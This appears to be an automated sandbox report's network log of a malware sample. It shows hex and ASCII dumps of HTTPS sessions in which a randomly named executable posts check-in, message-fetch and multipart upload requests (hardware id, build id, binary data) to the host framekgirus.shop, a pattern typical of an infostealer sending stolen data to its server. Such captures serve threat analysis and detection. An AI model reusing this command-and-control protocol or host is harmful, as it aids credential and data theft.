                                                                                                                2024-12-30 10:59:37 UTC1378INData Raw: 2b 85 ae 3b 8e 38 c7 93 bb f9 32 97 86 73 12 60 00 5c ce 28 57 26 da e0 97 44 15 81 30 14 37 d2 f1 8b ae 70 77 43 1c 09 93 b3 3a 78 52 6b 15 8b bd f2 85 16 5b f8 09 58 88 53 d9 63 3a fb eb 8c dd 29 43 69 7e 4b 4f 8b da f2 e7 98 65 be 9a 3e 17 9b 80 45 1f eb 47 7d d2 d0 12 c3 e0 59 dd 70 39 b5 b7 90 84 08 6a 69 17 84 72 a9 de a7 44 df 6b 74 09 1b 83 96 94 a7 56 88 46 ba bd 17 e1 92 c9 17 a4 17 e9 51 41 7b 11 8b 8f 9d 48 d5 b3 8c 15 d1 18 6d 96 d3 34 12 a2 ad 41 1a d5 e2 88 95 d8 2b 76 fc e5 4b f5 ce 60 76 50 aa 9b aa 75 50 2e f3 9c 65 01 8c bb 68 78 e9 be a3 94 1b 83 c4 7d 81 1c c8 9f 49 9a bd 06 61 68 f1 50 5a 3a eb b8 6e 2c 1c 74 cf 36 fc 11 77 92 a0 ce bc 1c 58 21 3a e1 43 f6 19 3e 87 7b f7 63 93 ad e6 20 c1 56 ff 6e 6c 80 22 ad ac d8 24 0d 79 84 2a 14
                                                                                                                Data Ascii: +;82s`\(W&D07pwC:xRk[XSc:)Ci~KOe>EG}Yp9jirDktVFQA{Hm4A+vK`vPuP.ehx}IahPZ:n,t6wX!:C>{c Vnl"$y*
                                                                                                                2024-12-30 10:59:37 UTC1378INData Raw: 2d 99 8f 4d 08 49 4d 83 be 36 50 52 82 12 a7 98 9d f2 59 31 0d f2 dc a5 17 b6 e3 62 30 57 40 72 68 55 b6 36 65 92 76 69 ce 73 95 43 48 75 d1 d0 3c bb af a3 cf 92 e2 a6 67 01 51 3e ca 4f 55 08 22 de 3b 36 b0 a1 9a 2b e1 09 97 87 5a 63 94 69 f8 82 4e 9c 2e b2 5b ff a3 48 c8 41 c6 3a b7 71 20 c0 b9 99 1e 84 de 5b 5a 27 14 5d f5 1e 35 f4 19 77 1f 84 72 c0 99 8b fc de 7c 09 31 e6 9c 28 2e 77 c5 ac 1b d8 26 ea 24 d2 61 87 f0 bb 1f 7b 24 d5 b4 7a 7a ea 8f 51 f3 9f 8c 58 cf 45 f8 0f cf 74 6e 93 ca 78 ff cf 66 ef 7a 5f 39 24 3f e9 f6 a9 94 0b e4 84 7f ce a8 b5 5f ef ba 13 c1 44 54 25 35 fb 9a 4e 74 37 16 93 2e 67 a4 08 16 c1 2d b0 6a 0c 10 13 a0 a2 68 40 26 18 24 e8 fc b8 b2 31 f3 e1 53 b5 a2 ec 73 f8 58 30 ee d2 c8 d2 ec 0f ad 82 94 b8 4b a9 cb 49 a8 df 60 ba 4f
                                                                                                                Data Ascii: -MIM6PRY1b0W@rhU6evisCHu<gQ>OU";6+ZciN.[HA:q [Z']5wr|1(.w&$a{$zzQXEtnxfz_9$?_DT%5Nt7.g-jh@&$1SsX0KI`O


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                2192.168.2.449732104.21.18.194437940C:\FkSpRTrp\jyidkjkfhjawd.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-12-30 10:59:39 UTC263OUTPOST /api HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                Content-Length: 8
                                                                                                                Host: framekgirus.shop
                                                                                                                2024-12-30 10:59:39 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                Data Ascii: act=life
                                                                                                                2024-12-30 10:59:39 UTC1117INHTTP/1.1 200 OK
                                                                                                                Date: Mon, 30 Dec 2024 10:59:39 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Transfer-Encoding: chunked
                                                                                                                Connection: close
                                                                                                                Set-Cookie: PHPSESSID=9q32ropqacndrb4ptc4o5gqjao; expires=Fri, 25 Apr 2025 04:46:18 GMT; Max-Age=9999999; path=/
                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                X-Frame-Options: DENY
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                vary: accept-encoding
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zWxnmJGJFUyId0mdCBWrdtSI%2F1LoIcj83cTgKOMUs3EUgXZBbsm7KVQFomA448g3PYx5dGSb669sjoWALBhN3CHMlQxzvZEL2mKA3iLGAmwhnAZA17AsjU2VWU59unnOGaAB"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8fa18589ab25182d-EWR
                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1746&min_rtt=1740&rtt_var=665&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2838&recv_bytes=907&delivery_rate=1629464&cwnd=145&unsent_bytes=0&cid=82ea2ef5e1851686&ts=475&x=0"
                                                                                                                2024-12-30 10:59:39 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                Data Ascii: 2ok
                                                                                                                2024-12-30 10:59:39 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                Data Ascii: 0


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                3192.168.2.449733104.21.18.194437940C:\FkSpRTrp\jyidkjkfhjawd.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-12-30 10:59:39 UTC264OUTPOST /api HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                Content-Length: 42
                                                                                                                Host: framekgirus.shop
                                                                                                                2024-12-30 10:59:39 UTC42OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 6e 62 59 52 4b 6c 2d 2d 26 6a 3d
                                                                                                                Data Ascii: act=recive_message&ver=4.0&lid=nbYRKl--&j=
                                                                                                                2024-12-30 10:59:40 UTC1123INHTTP/1.1 200 OK
                                                                                                                Date: Mon, 30 Dec 2024 10:59:40 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Transfer-Encoding: chunked
                                                                                                                Connection: close
                                                                                                                Set-Cookie: PHPSESSID=1tkeu446nbqqn1nq4o64adcn3c; expires=Fri, 25 Apr 2025 04:46:19 GMT; Max-Age=9999999; path=/
                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                X-Frame-Options: DENY
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                vary: accept-encoding
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vj9ADm72U5Yr2mgW7I7z4mSLf5bXEqLo%2Fe8qV8pXZ4LaiKiplrBk3T3NGGXfH12EaoEKHdNKZrglzavR7kKUwAdr%2Br3jxySm8upFo2kjbaed%2B6epk81WwoUc5sazdtee%2FN1D"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8fa1858f3f874356-EWR
                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2415&min_rtt=2342&rtt_var=930&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2838&recv_bytes=942&delivery_rate=1246797&cwnd=237&unsent_bytes=0&cid=49fdb94aea91abc0&ts=464&x=0"
                                                                                                                2024-12-30 10:59:40 UTC246INData Raw: 31 63 61 61 0d 0a 34 59 30 7a 68 4f 49 2f 70 6f 4e 57 72 61 39 36 2b 78 2f 56 73 35 65 30 63 4b 35 70 2f 44 4a 6b 79 33 70 75 57 2b 63 56 6e 59 61 61 72 30 57 6d 32 41 75 4b 6f 53 58 49 6a 55 43 50 62 61 44 57 75 35 59 52 79 6b 76 47 56 41 57 6e 43 51 74 33 78 57 50 77 70 4e 76 72 55 75 69 52 57 6f 71 68 4d 39 57 4e 51 4b 42 6b 39 39 62 35 6c 6b 71 4d 44 4a 5a 51 42 61 63 59 44 7a 43 49 5a 66 48 6c 69 65 46 55 37 49 64 63 77 75 49 36 77 4d 6f 66 6e 6e 36 2f 33 66 37 5a 47 4d 4e 4c 30 42 41 42 73 56 68 55 65 61 70 77 36 65 65 73 37 45 44 76 77 45 4b 4b 2b 48 54 49 77 56 6a 42 50 62 54 57 39 64 67 57 79 67 4b 55 57 67 79 76 47 51 6f 78 6c 33 7a 37 37 6f 6e 76 56 2b 32 4e 56 64 62 76 4d 4d 66 42 47 5a 52 2b 39 35 2b 31 30 51 71 4d
                                                                                                                Data Ascii: 1caa4Y0zhOI/poNWra96+x/Vs5e0cK5p/DJky3puW+cVnYaar0Wm2AuKoSXIjUCPbaDWu5YRykvGVAWnCQt3xWPwpNvrUuiRWoqhM9WNQKBk99b5lkqMDJZQBacYDzCIZfHlieFU7IdcwuI6wMofnn6/3f7ZGMNL0BABsVhUeapw6ees7EDvwEKK+HTIwVjBPbTW9dgWygKUWgyvGQoxl3z77onvV+2NVdbvMMfBGZR+95+10QqM
                                                                                                                2024-12-30 10:59:40 UTC1369INData Raw: 55 39 34 44 4e 4b 6f 4a 48 53 79 49 5a 2f 6d 6b 6e 4b 46 49 70 6f 64 52 68 4c 6c 30 78 38 45 57 6e 48 36 34 31 76 54 57 41 4d 4d 4c 6e 56 67 4f 72 52 49 44 4e 6f 70 35 39 65 4f 4c 35 6c 62 70 68 31 58 43 37 6a 65 50 67 31 69 65 5a 66 65 4a 74 66 59 43 7a 77 69 4b 58 52 66 70 42 30 49 67 78 58 44 7a 70 4e 75 76 56 2b 69 42 55 4d 54 7a 50 4d 54 47 48 59 74 32 76 74 7a 34 31 68 2f 47 42 4a 31 51 41 61 4d 53 41 7a 4f 42 65 76 4c 69 67 2b 38 52 71 4d 42 61 33 4b 46 73 6a 2b 34 64 69 58 71 37 78 37 66 73 55 74 4e 46 68 78 41 42 70 56 68 55 65 59 31 79 2f 4f 65 49 34 46 4c 75 69 30 2f 45 38 7a 4c 43 79 41 71 66 65 4c 6e 62 39 73 51 59 77 67 32 64 57 51 32 67 48 51 73 39 78 54 6d 2f 34 35 75 76 43 61 61 68 55 4d 2f 74 50 74 6a 4e 57 49 59 7a 72 70 48 79 32 6c 4b
                                                                                                                Data Ascii: U94DNKoJHSyIZ/mknKFIpodRhLl0x8EWnH641vTWAMMLnVgOrRIDNop59eOL5lbph1XC7jePg1ieZfeJtfYCzwiKXRfpB0IgxXDzpNuvV+iBUMTzPMTGHYt2vtz41h/GBJ1QAaMSAzOBevLig+8RqMBa3KFsj+4diXq7x7fsUtNFhxABpVhUeY1y/OeI4FLui0/E8zLCyAqfeLnb9sQYwg2dWQ2gHQs9xTm/45uvCaahUM/tPtjNWIYzrpHy2lK
                                                                                                                2024-12-30 10:59:40 UTC1369INData Raw: 51 72 70 56 6b 77 2b 6e 54 65 6e 70 4b 6e 73 52 65 57 4b 48 2f 48 69 4f 73 48 4b 44 74 6c 69 2b 63 69 31 30 52 36 4d 55 39 35 64 42 36 45 65 48 6a 61 49 64 50 48 71 6a 4f 70 65 37 6f 42 64 79 65 51 77 78 4d 59 62 6c 48 6d 6c 32 2f 58 65 46 38 30 42 6c 42 42 49 36 52 38 55 65 64 30 33 7a 76 4f 49 72 57 54 6c 6a 6c 50 44 39 33 54 51 67 77 48 5a 65 72 75 52 72 5a 59 66 78 41 36 62 58 77 65 6a 46 67 6b 7a 69 58 2f 78 35 35 48 67 56 65 61 4d 56 63 37 73 4f 73 76 46 45 5a 4a 32 73 64 48 30 33 46 4b 43 53 35 6c 49 52 76 46 59 4f 44 36 4a 65 76 43 6d 74 75 78 66 36 49 64 4c 68 50 35 36 31 6f 30 66 6c 54 33 76 6b 66 6e 66 45 73 63 42 6d 6c 41 42 70 42 30 50 50 6f 5a 36 2b 4f 36 4e 36 46 58 71 69 56 44 43 34 54 50 4c 79 41 71 63 64 4c 76 64 74 5a 68 53 79 78 50 65
                                                                                                                Data Ascii: QrpVkw+nTenpKnsReWKH/HiOsHKDtli+ci10R6MU95dB6EeHjaIdPHqjOpe7oBdyeQwxMYblHml2/XeF80BlBBI6R8Ued03zvOIrWTljlPD93TQgwHZeruRrZYfxA6bXwejFgkziX/x55HgVeaMVc7sOsvFEZJ2sdH03FKCS5lIRvFYOD6JevCmtuxf6IdLhP561o0flT3vkfnfEscBmlABpB0PPoZ6+O6N6FXqiVDC4TPLyAqcdLvdtZhSyxPe
                                                                                                                2024-12-30 10:59:40 UTC1369INData Raw: 38 41 65 64 30 33 39 75 32 52 34 56 2f 76 6a 56 76 4d 35 6a 72 43 78 68 36 53 65 72 44 58 2b 4e 34 66 79 51 69 66 56 41 79 37 47 77 63 7a 69 48 32 2f 71 73 50 6f 53 61 62 59 48 65 50 74 48 64 2f 57 43 6f 38 39 71 4a 2f 73 6c 68 58 41 53 38 59 51 42 61 59 52 41 7a 47 4e 65 50 44 67 6a 65 6c 58 36 34 56 53 7a 76 4d 38 77 63 41 54 6c 6e 61 6c 30 66 6a 53 48 73 67 44 6c 56 70 47 35 31 67 4c 49 63 55 76 76 39 47 4f 34 46 48 6c 6c 68 33 62 72 79 32 50 79 68 54 5a 4a 66 66 64 2b 39 59 64 77 41 65 56 57 41 65 6c 46 67 73 38 6a 48 2f 33 39 6f 4c 72 57 65 65 4f 55 73 58 6c 4d 63 72 4a 48 35 31 37 75 4a 47 37 6c 68 58 55 53 38 59 51 4b 59 34 74 54 68 69 2f 4e 2b 43 71 6d 71 39 57 36 73 41 46 68 4f 30 33 77 38 55 58 6e 33 53 37 32 2f 7a 64 48 73 63 50 6b 6c 6b 44 72
                                                                                                                Data Ascii: 8Aed039u2R4V/vjVvM5jrCxh6SerDX+N4fyQifVAy7GwcziH2/qsPoSabYHePtHd/WCo89qJ/slhXAS8YQBaYRAzGNePDgjelX64VSzvM8wcATlnal0fjSHsgDlVpG51gLIcUvv9GO4FHllh3bry2PyhTZJffd+9YdwAeVWAelFgs8jH/39oLrWeeOUsXlMcrJH517uJG7lhXUS8YQKY4tThi/N+Cqmq9W6sAFhO03w8UXn3S72/zdHscPklkDr
                                                                                                                2024-12-30 10:59:40 UTC1369INData Raw: 44 5a 66 6a 74 6b 65 46 63 36 59 68 56 7a 65 41 77 79 73 41 65 6c 58 65 32 31 76 76 59 47 6f 78 46 33 6c 63 65 36 55 42 4d 47 4a 56 73 37 66 4b 4f 7a 6c 7a 70 77 45 4b 4b 2b 48 54 49 77 56 6a 42 50 62 37 44 38 64 73 41 78 51 79 51 58 77 57 37 47 51 45 79 6c 33 44 77 34 49 54 6a 56 2b 6d 47 58 4d 48 72 4f 4d 6a 49 45 35 5a 78 39 35 2b 31 30 51 71 4d 55 39 35 2b 44 62 6f 50 44 7a 65 4f 59 65 53 6b 6e 4b 46 49 70 6f 64 52 68 4c 6c 30 7a 4d 59 54 6e 58 32 37 30 66 48 62 45 74 34 45 6d 56 63 50 6f 67 6f 47 50 6f 4a 38 39 2b 2b 4d 36 55 50 71 6a 6b 2f 42 38 79 61 50 67 31 69 65 5a 66 65 4a 74 65 41 56 33 42 75 64 45 6a 65 2f 47 78 6f 79 69 48 75 2f 2b 38 33 32 45 65 47 4d 48 5a 79 68 4d 73 44 45 47 35 5a 38 76 74 33 34 30 78 76 4a 43 70 68 55 44 4b 4d 59 43 6a
                                                                                                                Data Ascii: DZfjtkeFc6YhVzeAwysAelXe21vvYGoxF3lce6UBMGJVs7fKOzlzpwEKK+HTIwVjBPb7D8dsAxQyQXwW7GQEyl3Dw4ITjV+mGXMHrOMjIE5Zx95+10QqMU95+DboPDzeOYeSknKFIpodRhLl0zMYTnX270fHbEt4EmVcPogoGPoJ89++M6UPqjk/B8yaPg1ieZfeJteAV3BudEje/GxoyiHu/+832EeGMHZyhMsDEG5Z8vt340xvJCphUDKMYCj
                                                                                                                2024-12-30 10:59:40 UTC1369INData Raw: 2f 63 50 6f 58 61 62 59 48 63 66 6d 4e 38 37 48 45 5a 56 79 73 4e 58 6e 33 42 58 65 43 70 39 62 43 36 55 59 41 54 53 50 64 76 62 70 6a 2b 4a 57 34 59 39 59 68 4b 39 30 79 4e 56 59 77 54 32 57 33 50 37 61 53 5a 5a 4c 67 52 34 66 36 52 38 41 65 64 30 33 2f 2b 36 47 35 56 7a 6c 6a 31 37 57 34 44 4c 64 7a 52 57 54 62 37 33 61 38 4e 73 66 77 51 69 59 56 67 32 6c 43 67 55 35 68 6e 79 2f 71 73 50 6f 53 61 62 59 48 65 66 32 49 73 58 4b 46 49 39 32 74 74 4c 6a 32 77 4b 4d 52 64 35 42 41 62 68 59 56 43 2b 56 59 50 6a 37 7a 66 59 52 34 59 77 64 6e 4b 45 79 78 73 73 66 6e 33 4f 6c 31 50 50 5a 48 63 55 43 6d 6c 67 46 71 52 77 49 50 6f 42 30 38 2b 2b 45 37 46 37 69 69 56 50 4e 37 6e 53 42 6a 52 2b 42 50 65 2b 52 31 4d 30 52 77 41 62 65 54 30 69 77 57 41 73 31 78 53 2b
                                                                                                                Data Ascii: /cPoXabYHcfmN87HEZVysNXn3BXeCp9bC6UYATSPdvbpj+JW4Y9YhK90yNVYwT2W3P7aSZZLgR4f6R8Aed03/+6G5Vzlj17W4DLdzRWTb73a8NsfwQiYVg2lCgU5hny/qsPoSabYHef2IsXKFI92ttLj2wKMRd5BAbhYVC+VYPj7zfYR4YwdnKEyxssfn3Ol1PPZHcUCmlgFqRwIPoB08++E7F7iiVPN7nSBjR+BPe+R1M0RwAbeT0iwWAs1xS+
                                                                                                                2024-12-30 10:59:40 UTC255INData Raw: 33 48 74 6c 6c 6a 44 39 33 62 36 7a 68 61 58 65 71 47 52 36 75 6c 63 6a 41 53 45 45 46 36 51 41 55 77 2b 69 54 65 6e 70 4a 62 6f 55 65 47 61 53 38 50 74 4a 63 54 41 46 4c 74 79 73 4d 66 32 32 52 48 64 41 74 4a 62 43 2b 6c 57 54 44 36 64 4e 36 65 6b 72 4f 68 48 35 61 39 65 31 65 68 30 67 59 30 66 6a 7a 33 76 6b 63 75 57 41 4d 38 62 6e 56 38 58 6c 31 68 55 49 4c 73 33 39 50 4b 45 2f 31 4c 77 69 31 44 49 38 41 71 50 6c 55 7a 4c 4c 2b 57 44 70 38 6c 53 30 7a 54 51 45 41 66 70 51 44 55 67 78 57 47 2f 76 4e 47 68 45 66 54 41 42 59 53 6d 4e 39 33 66 48 70 70 72 74 4a 62 4c 36 44 58 61 41 5a 6c 41 41 62 34 58 54 48 66 46 65 4c 2b 38 75 71 39 59 34 5a 74 4d 30 75 77 6b 79 49 30 6e 31 7a 32 76 6b 61 32 57 4a 38 38 46 6b 46 63 51 75 46 55 72 4c 34 39 77 37 2b 0d 0a
                                                                                                                Data Ascii: 3HtlljD93b6zhaXeqGR6ulcjASEEF6QAUw+iTenpJboUeGaS8PtJcTAFLtysMf22RHdAtJbC+lWTD6dN6ekrOhH5a9e1eh0gY0fjz3vkcuWAM8bnV8Xl1hUILs39PKE/1Lwi1DI8AqPlUzLL+WDp8lS0zTQEAfpQDUgxWG/vNGhEfTABYSmN93fHpprtJbL6DXaAZlAAb4XTHfFeL+8uq9Y4ZtM0uwkyI0n1z2vka2WJ88FkFcQuFUrL49w7+
                                                                                                                2024-12-30 10:59:40 UTC1369INData Raw: 32 63 65 61 0d 0a 4f 55 34 42 47 6f 77 46 75 45 75 57 65 42 6a 52 79 49 50 65 2b 42 70 34 31 48 6e 31 7a 4f 41 68 6e 6e 41 55 77 76 78 53 2b 74 71 73 50 39 45 62 37 41 47 73 66 7a 4a 73 6e 4f 44 70 6f 36 69 65 2f 53 7a 42 2f 4b 48 49 39 75 4f 4b 34 43 41 54 2b 53 5a 72 50 78 67 4f 46 66 34 5a 59 64 69 71 45 37 6a 35 55 68 32 54 58 33 37 72 75 57 43 6f 78 54 33 6d 55 46 70 78 59 4c 4c 35 51 36 32 50 36 4f 36 55 62 33 77 42 4f 45 35 33 53 58 6e 31 62 5a 65 61 61 52 72 59 5a 41 6c 31 37 4e 42 31 62 37 42 30 49 67 78 57 47 2f 76 4e 47 68 45 66 54 41 42 59 53 6d 4e 39 33 66 48 70 70 72 74 4a 62 4c 36 44 7a 4c 44 5a 74 58 46 75 73 32 42 79 32 43 4e 37 47 6b 6a 4b 38 4a 33 38 41 56 68 4e 35 36 6a 39 56 59 77 54 32 43 30 76 76 59 46 64 6f 61 30 33 34 42 72 78 30
                                                                                                                Data Ascii: 2ceaOU4BGowFuEuWeBjRyIPe+Bp41Hn1zOAhnnAUwvxS+tqsP9Eb7AGsfzJsnODpo6ie/SzB/KHI9uOK4CAT+SZrPxgOFf4ZYdiqE7j5Uh2TX37ruWCoxT3mUFpxYLL5Q62P6O6Ub3wBOE53SXn1bZeaaRrYZAl17NB1b7B0IgxWG/vNGhEfTABYSmN93fHpprtJbL6DzLDZtXFus2By2CN7GkjK8J38AVhN56j9VYwT2C0vvYFdoa034Brx0
                                                                                                                2024-12-30 10:59:40 UTC1369INData Raw: 2b 32 6b 32 36 38 57 35 5a 4a 50 77 75 49 69 7a 49 6f 6d 70 31 71 35 31 76 54 41 41 74 73 45 6f 47 34 54 71 68 59 43 50 70 4e 6d 76 36 72 44 34 42 47 2b 75 52 32 4d 6f 51 75 42 6a 51 44 5a 4a 66 66 6b 39 74 67 63 79 78 32 50 48 53 47 6e 48 77 30 76 6c 57 44 77 70 4d 32 76 56 36 62 59 44 34 71 68 4d 4e 36 4e 51 4d 6b 76 37 49 53 6d 67 55 4b 65 46 4e 42 4a 52 72 39 59 56 47 76 4c 4e 2b 32 6b 32 36 38 57 35 5a 4a 50 77 75 49 69 7a 49 6f 6d 70 31 71 35 31 76 54 41 41 74 73 45 30 58 34 77 69 43 59 79 4c 49 5a 35 38 65 4f 56 2f 68 47 6f 77 46 4b 45 75 51 32 50 68 56 69 6d 4d 2f 66 4a 74 59 35 53 2b 51 69 51 58 67 47 2f 43 55 45 65 69 33 44 2b 38 70 50 34 58 71 6d 75 61 2b 57 68 65 6f 2f 4c 57 4d 45 76 2b 5a 48 78 78 31 4b 55 57 38 77 4c 55 2f 70 50 58 47 75 61
                                                                                                                Data Ascii: +2k268W5ZJPwuIizIomp1q51vTAAtsEoG4TqhYCPpNmv6rD4BG+uR2MoQuBjQDZJffk9tgcyx2PHSGnHw0vlWDwpM2vV6bYD4qhMN6NQMkv7ISmgUKeFNBJRr9YVGvLN+2k268W5ZJPwuIizIomp1q51vTAAtsE0X4wiCYyLIZ58eOV/hGowFKEuQ2PhVimM/fJtY5S+QiQXgG/CUEei3D+8pP4Xqmua+Wheo/LWMEv+ZHxx1KUW8wLU/pPXGua


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                4192.168.2.449735104.21.18.194437940C:\FkSpRTrp\jyidkjkfhjawd.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-12-30 10:59:41 UTC276OUTPOST /api HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                Content-Type: multipart/form-data; boundary=JZVI9SMSXV6J
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                Content-Length: 18122
                                                                                                                Host: framekgirus.shop
                                                                                                                2024-12-30 10:59:41 UTC15331OUTData Raw: 2d 2d 4a 5a 56 49 39 53 4d 53 58 56 36 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 35 38 45 36 39 30 41 30 42 42 32 32 44 38 36 32 30 41 34 43 34 37 36 46 44 35 31 42 43 42 31 0d 0a 2d 2d 4a 5a 56 49 39 53 4d 53 58 56 36 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4a 5a 56 49 39 53 4d 53 58 56 36 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 6e 62 59 52 4b 6c 2d 2d 0d 0a 2d 2d 4a 5a 56 49 39 53 4d 53 58 56 36 4a 0d 0a 43 6f 6e 74 65
                                                                                                                Data Ascii: --JZVI9SMSXV6JContent-Disposition: form-data; name="hwid"658E690A0BB22D8620A4C476FD51BCB1--JZVI9SMSXV6JContent-Disposition: form-data; name="pid"2--JZVI9SMSXV6JContent-Disposition: form-data; name="lid"nbYRKl----JZVI9SMSXV6JConte
                                                                                                                2024-12-30 10:59:41 UTC2791OUTData Raw: 0a 66 e1 9f 97 c5 15 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36 af a9 da 16 51 bc 21 8f 77 45 11 8f 43 d4 61 11 d5 14 88 8d cc 54 77 94 6d 93 be 93 15 d7 52
                                                                                                                Data Ascii: f.\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6Q!wECaTwmR
                                                                                                                2024-12-30 10:59:41 UTC1129INHTTP/1.1 200 OK
                                                                                                                Date: Mon, 30 Dec 2024 10:59:41 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Transfer-Encoding: chunked
                                                                                                                Connection: close
                                                                                                                Set-Cookie: PHPSESSID=437d38e4nfua65dunl9bsd3kns; expires=Fri, 25 Apr 2025 04:46:20 GMT; Max-Age=9999999; path=/
                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                X-Frame-Options: DENY
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                vary: accept-encoding
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HB%2FEkFIjf968QTeaBSEYpf7tMnT66jq2AcSYdQlljBtMboL8osu0xVnPTIVBBRLowtqgWQWJ%2FqOpedd8Urk%2BLO465Gj912gelas5yvJ%2FL33zgwuHQ%2BMhabCYh3GaWPHyrk9u"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8fa18597ed01c457-EWR
                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1676&min_rtt=1671&rtt_var=637&sent=11&recv=22&lost=0&retrans=0&sent_bytes=2839&recv_bytes=19078&delivery_rate=1703617&cwnd=252&unsent_bytes=0&cid=fc619c2a15f329f6&ts=569&x=0"
                                                                                                                2024-12-30 10:59:41 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                Data Ascii: fok 8.46.123.189
                                                                                                                2024-12-30 10:59:41 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                Data Ascii: 0


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                5192.168.2.449739104.21.18.194437940C:\FkSpRTrp\jyidkjkfhjawd.exe
                                                                                                                TimestampBytes transferredDirectionData
